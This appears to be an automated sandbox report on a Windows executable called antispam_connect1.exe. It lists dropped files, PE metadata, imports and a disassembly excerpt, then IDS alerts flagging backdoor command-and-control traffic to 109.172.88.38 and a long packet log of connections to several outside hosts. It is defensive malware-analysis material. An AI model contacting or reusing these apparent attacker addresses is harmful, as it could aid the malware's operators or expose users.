                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jf1tngh0.0pg.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oiwugu0i.1x1.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\config

                                            Download File
                                            Process:C:\Users\user\Desktop\antispam_connect1.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):416
                                            Entropy (8bit):6.261819491284434
                                            Encrypted:false
                                            SSDEEP:12:eBfhjrj1yPs1I5jtdjIjyNieZubkZjb2bC4A:evjKiIdEjyNiOuYNOlA
                                            MD5:FCCD33E42CFB13BF2B59A4E61623ADD5
                                            SHA1:33699D94EC298063B40AC858A6B995B1B30F1812
                                            SHA-256:3BC89D5FEA43CA7561364AD1BAB2A37EE7B5F3998AC53F2E390C1794B3E3AF18
                                            SHA-512:EA2334DCCA725165FB7E06EDBFB27F67F7BB87BF5F41F3EF24D387B772D1BF38C6210D4F544BC4E25B47FE652D2CA7BCB30499C765F48CDF302D2D377CB029D5
                                            Malicious:false
                                            Preview:.^84.?.9..<..=<RS,TWA.+(L.&#]./VX.\.M..1Q.Q'@.-,Q=.+Z.[+\0..M^%.X3..^4.VUW".E0.......Y.+.!!:..>PY[>"F/..AQ_3W.W._.;)@S..[]*,G#..\,. P.!^_ -V@4. U..#X.V;B..5.&.6.#.....1.#.RS"Z A.Q.L.8.P.+.].?^M-.,X.,.VU.1VV?.G.;._*.,V..VP ..@../Q?&_\!(.].^.O.(?..6 ..95.:...5..T'0)L_.1F...W".5R;<1GS.;\7..R../[^,.@/&.R#.._?..X...M.Z,P*T6_...O-.,.,[_.<;-.'.$.7..T!/_L..UF.,._"#-[5.!Q"W.@..(R .<Z47^^.9UM..4[44+^1=PU._+G$P.\. WW..+Z1.<

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):5.52276564871013
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:antispam_connect1.exe
                                            File size:6'955'008 bytes
                                            MD5:970c918fdde70fd4e57c0db74cb54be0
                                            SHA1:b1296b7f95cab45b215704de26c8c8bd91cc83b5
                                            SHA256:18cf24c3c90042ffdb9a96d415ad87d78dea4b47cef22e0ba52380de8225b8f0
                                            SHA512:3e7251dc612cb2fd45c76934a342efabce3acb05bce49157e992ebe2dc585c82b97e1bf00ee7babbcb58ff1d56ce46097c244c9c3ba6d35a873daec5c554637b
                                            SSDEEP:98304:BpHghSmPld7yDHVD2tgyxqC135HgZ4CuQFV0j5DQwHmbRuYRRTis:BahXXmD1itXqCJ5HVCuQf0Ok8RVnis
                                            TLSH:EC66D557EEC56F6BC83E947619DF886628B2C8887F028927B75C5A653013718BBC770C
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......yyrK=...=...=...=...<....F..>....F..,....F.. ....F..,.......4.......E.......%.......8...=...]....F..?....F..<....F..<...Rich=..

                                            File Icon

                                            Icon Hash:00928e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x406137
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x66FFF92E [Fri Oct 4 14:18:22 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:6
                                            OS Version Minor:0
                                            File Version Major:6
                                            File Version Minor:0
                                            Subsystem Version Major:6
                                            Subsystem Version Minor:0
                                            Import Hash:87d823a9ce266eb229c3b8fc80389570

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F87E12C58F2h
                                            jmp 00007F87E12C5513h
                                            push ebp
                                            mov ebp, esp
                                            mov eax, dword ptr [ebp+08h]
                                            push esi
                                            mov ecx, dword ptr [eax+3Ch]
                                            add ecx, eax
                                            movzx eax, word ptr [ecx+14h]
                                            lea edx, dword ptr [ecx+18h]
                                            add edx, eax
                                            movzx eax, word ptr [ecx+06h]
                                            imul esi, eax, 28h
                                            add esi, edx
                                            cmp edx, esi
                                            je 00007F87E12C569Bh
                                            mov ecx, dword ptr [ebp+0Ch]
                                            cmp ecx, dword ptr [edx+0Ch]
                                            jc 00007F87E12C568Ch
                                            mov eax, dword ptr [edx+08h]
                                            add eax, dword ptr [edx+0Ch]
                                            cmp ecx, eax
                                            jc 00007F87E12C568Eh
                                            add edx, 28h
                                            cmp edx, esi
                                            jne 00007F87E12C566Ch
                                            xor eax, eax
                                            pop esi
                                            pop ebp
                                            ret
                                            mov eax, edx
                                            jmp 00007F87E12C567Bh
                                            call 00007F87E12C5E0Ah
                                            test eax, eax
                                            jne 00007F87E12C5685h
                                            xor al, al
                                            ret
                                            mov eax, dword ptr fs:[00000018h]
                                            push esi
                                            mov esi, 00AA1E38h
                                            mov edx, dword ptr [eax+04h]
                                            jmp 00007F87E12C5686h
                                            cmp edx, eax
                                            je 00007F87E12C5692h
                                            xor eax, eax
                                            mov ecx, edx
                                            lock cmpxchg dword ptr [esi], ecx
                                            test eax, eax
                                            jne 00007F87E12C5672h
                                            xor al, al
                                            pop esi
                                            ret
                                            mov al, 01h
                                            pop esi
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            cmp dword ptr [ebp+08h], 00000000h
                                            jne 00007F87E12C5689h
                                            mov byte ptr [00AA1E54h], 00000001h
                                            call 00007F87E12C5C21h
                                            call 00007F87E12C60A7h
                                            test al, al
                                            jne 00007F87E12C5686h
                                            xor al, al
                                            pop ebp
                                            ret
                                            call 00007F87E12C915Dh
                                            test al, al
                                            jne 00007F87E12C568Ch
                                            push 00000000h
                                            call 00007F87E12C60B8h
                                            pop ecx
                                            jmp 00007F87E12C566Bh
                                            mov al, 01h
                                            pop ebp
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 0Ch
                                            push esi
                                            mov esi, dword ptr [ebp+08h]
                                            test esi, esi

                                            Rich Headers

                                            Programming Language:
                                            • [ C ] VS2015 UPD3.1 build 24215

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x44c7c40x3c.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6a40000x1e0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x6a50000x16e4.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x44bf800x1c.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x44bfa00x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x140000x138.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x120b10x122001ac8cab19530b4757be5dc19b9a1067cFalse0.5229929956896552data6.724608949332727IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x140000x438ed60x43900088409a264cc547d14f1f84a33ccef5b9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x44d0000x2559600x254e00d855adc436a39f865984d1e70fb4dc06unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .gfids0x6a30000xac0x200f6bc001410404bd6a3e9c64046ec76b5False0.279296875data1.4243123714093135IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .rsrc0x6a40000x1e00x20034442f509ec3c01f66e7516c976442abFalse0.52734375data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x6a50000x16e40x18008ad16325c76aac355eebe615261cda98False0.74951171875data6.502312402778559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_MANIFEST0x6a40600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                            Imports

                                            DLLImport
                                            KERNEL32.dllInitializeCriticalSection, CreateFileA, WriteFile, CloseHandle, GetLastError, TryEnterCriticalSection, GetFileAttributesA, FindFirstFileA, FindNextFileA, LeaveCriticalSection, GetFileType, SetEndOfFile, SetFilePointer, CreateNamedPipeA, PeekNamedPipe, ExitProcess, VirtualAlloc, SetHandleInformation, FindClose, EnterCriticalSection, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, TerminateProcess, RtlUnwind, SetLastError, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, GetModuleFileNameW, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, DecodePointer, CreateFileW, RaiseException
                                            AVIFIL32.dllAVIFileOpenA

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-10-14T17:22:22.101286+02002855539ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M21109.172.88.3812658192.168.2.549705TCP
                                            2024-10-14T17:22:22.101463+02002855536ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M11192.168.2.549705109.172.88.3812658TCP
                                            2024-10-14T17:22:51.459438+02002855537ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M21192.168.2.549705109.172.88.3812658TCP
                                            2024-10-14T17:22:51.683092+02002855538ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M11109.172.88.3812658192.168.2.549705TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 14, 2024 17:22:20.396753073 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:20.401643991 CEST804970446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:20.401743889 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:20.402834892 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:20.408046961 CEST804970446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:21.447716951 CEST804970446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:21.452435970 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:22:21.459000111 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:22:21.459076881 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:22:21.491427898 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:22.101285934 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:22:22.101463079 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:22:22.106338024 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:22:36.938982964 CEST4978480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:36.944680929 CEST804978446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:36.945841074 CEST4978480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:36.946562052 CEST4978480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:36.951904058 CEST804978446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:37.226855040 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:22:37.232384920 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:22:37.610862017 CEST804978446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:37.628695011 CEST4979080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:37.633723974 CEST804979046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:22:37.633824110 CEST4979080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:37.634156942 CEST4979080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:37.639127970 CEST804979046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:22:37.759937048 CEST4978480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:38.384016991 CEST804979046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:22:38.431571960 CEST4979080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:38.472533941 CEST4979180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:38.477780104 CEST804979193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:22:38.477888107 CEST4979180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:38.481688976 CEST4979180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:38.487556934 CEST804979193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:22:39.177650928 CEST804979193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:22:39.193622112 CEST4979780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:39.198493958 CEST804979791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:22:39.198575974 CEST4979780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:39.199464083 CEST4979780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:39.204591036 CEST804979791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:22:39.278326035 CEST4979180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:39.915122986 CEST804979791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:22:39.931206942 CEST4980380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:22:39.936105967 CEST8049803188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:22:39.936191082 CEST4980380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:22:39.936436892 CEST4980380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:22:39.941313028 CEST8049803188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:22:39.968287945 CEST4979780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:41.036286116 CEST8049803188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:22:41.043606997 CEST4980380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:22:41.043643951 CEST4979780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:41.043663979 CEST4979180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:41.043725967 CEST4978480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:41.043750048 CEST4979080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:41.048897028 CEST8049803188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:22:41.048957109 CEST4980380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:22:41.049745083 CEST804979791.212.166.91192.168.2.5
                                            Oct 14, 2024 17:22:41.049777985 CEST804979193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:22:41.049802065 CEST4979780192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:41.049807072 CEST804978446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:41.049829006 CEST4979180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:41.049848080 CEST4978480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:41.050717115 CEST804979046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:22:41.050837040 CEST4979080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:42.090611935 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:22:42.091211081 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:22:42.096123934 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:22:45.430747986 CEST4983980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:45.435581923 CEST804983946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:45.435693026 CEST4983980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:45.436721087 CEST4983980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:45.441530943 CEST804983946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:46.197560072 CEST804983946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:46.214862108 CEST4984480192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:46.219769955 CEST804984446.8.236.61192.168.2.5
                                            Oct 14, 2024 17:22:46.220168114 CEST4984480192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:46.220381021 CEST4984480192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:46.225419998 CEST804984446.8.236.61192.168.2.5
                                            Oct 14, 2024 17:22:46.267865896 CEST4983980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:46.910882950 CEST804984446.8.236.61192.168.2.5
                                            Oct 14, 2024 17:22:46.927484989 CEST4984980192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:46.933350086 CEST804984993.185.159.253192.168.2.5
                                            Oct 14, 2024 17:22:46.933461905 CEST4984980192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:46.933666945 CEST4984980192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:46.941435099 CEST804984993.185.159.253192.168.2.5
                                            Oct 14, 2024 17:22:46.966461897 CEST4984480192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:47.658917904 CEST804984993.185.159.253192.168.2.5
                                            Oct 14, 2024 17:22:47.676707983 CEST4985580192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:47.682775974 CEST804985591.212.166.91192.168.2.5
                                            Oct 14, 2024 17:22:47.682898045 CEST4985580192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:47.683094025 CEST4985580192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:47.688261032 CEST804985591.212.166.91192.168.2.5
                                            Oct 14, 2024 17:22:47.699351072 CEST4984980192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:48.412225962 CEST804985591.212.166.91192.168.2.5
                                            Oct 14, 2024 17:22:48.434469938 CEST4985880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:22:48.439407110 CEST8049858188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:22:48.441518068 CEST4985880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:22:48.441749096 CEST4985880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:22:48.446701050 CEST8049858188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:22:48.461527109 CEST4985580192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:49.223556995 CEST8049858188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:22:49.223841906 CEST4985880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:22:49.223893881 CEST4985580192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:49.223913908 CEST4984980192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:49.223953962 CEST4984480192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:49.223969936 CEST4983980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:49.229590893 CEST8049858188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:22:49.229681015 CEST4985880192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:22:49.229712009 CEST804985591.212.166.91192.168.2.5
                                            Oct 14, 2024 17:22:49.229768991 CEST4985580192.168.2.591.212.166.91
                                            Oct 14, 2024 17:22:49.230628014 CEST804984993.185.159.253192.168.2.5
                                            Oct 14, 2024 17:22:49.230680943 CEST4984980192.168.2.593.185.159.253
                                            Oct 14, 2024 17:22:49.230838060 CEST804984446.8.236.61192.168.2.5
                                            Oct 14, 2024 17:22:49.230849028 CEST804983946.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:49.230886936 CEST4984480192.168.2.546.8.236.61
                                            Oct 14, 2024 17:22:49.230921030 CEST4983980192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:51.459043026 CEST4970480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:22:51.459438086 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:22:51.465888977 CEST804970446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:22:51.466068983 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:22:51.683092117 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:22:51.732002020 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:02.315304995 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:02.315613985 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:02.322107077 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:11.051637888 CEST4998480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:11.056602955 CEST804998446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:11.056700945 CEST4998480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:11.056999922 CEST4998480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:11.061791897 CEST804998446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:11.747373104 CEST804998446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:11.764043093 CEST4999080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:11.768891096 CEST804999046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:11.768963099 CEST4999080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:11.769184113 CEST4999080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:11.773931980 CEST804999046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:11.800873041 CEST4998480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:12.469032049 CEST804999046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:12.485161066 CEST4999180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:12.490322113 CEST804999193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:12.490412951 CEST4999180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:12.490675926 CEST4999180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:12.498085976 CEST804999193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:12.522579908 CEST4999080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:13.182403088 CEST804999193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:13.199312925 CEST4999280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:13.204157114 CEST804999291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:13.204232931 CEST4999280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:13.204442978 CEST4999280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:13.209237099 CEST804999291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:13.236108065 CEST4999180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:13.908325911 CEST804999291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:13.925270081 CEST4999380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:13.930243969 CEST8049993188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:13.930339098 CEST4999380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:13.930579901 CEST4999380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:13.935553074 CEST8049993188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:13.962256908 CEST4999280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:15.151458025 CEST8049993188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:15.151659012 CEST4999380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:15.151712894 CEST4999280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:15.151737928 CEST4999180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:15.151763916 CEST4999080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:15.151892900 CEST4998480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:15.153148890 CEST8049993188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:15.153220892 CEST4999380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:15.162532091 CEST8049993188.130.206.243192.168.2.5
                                            Oct 14, 2024 17:23:15.162542105 CEST804999291.212.166.91192.168.2.5
                                            Oct 14, 2024 17:23:15.162564039 CEST804999193.185.159.253192.168.2.5
                                            Oct 14, 2024 17:23:15.162616968 CEST4999280192.168.2.591.212.166.91
                                            Oct 14, 2024 17:23:15.162638903 CEST4999180192.168.2.593.185.159.253
                                            Oct 14, 2024 17:23:15.162684917 CEST4999380192.168.2.5188.130.206.243
                                            Oct 14, 2024 17:23:15.162705898 CEST804999046.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:15.162714005 CEST804998446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:15.162748098 CEST4999080192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:15.162805080 CEST4998480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:17.324306965 CEST4970512658192.168.2.5109.172.88.38
                                            Oct 14, 2024 17:23:17.329317093 CEST1265849705109.172.88.38192.168.2.5
                                            Oct 14, 2024 17:23:19.246088982 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:19.408761024 CEST804999446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:19.408886909 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:19.409221888 CEST4999480192.168.2.546.8.232.106
                                            Oct 14, 2024 17:23:19.414187908 CEST804999446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:20.160610914 CEST804999446.8.232.106192.168.2.5
                                            Oct 14, 2024 17:23:20.176886082 CEST4999580192.168.2.546.8.236.61
                                            Oct 14, 2024 17:23:20.181832075 CEST804999546.8.236.61192.168.2.5
                                            Oct 14, 2024 17:23:20.181934118 CEST4999580192.168.2.546.8.236.61
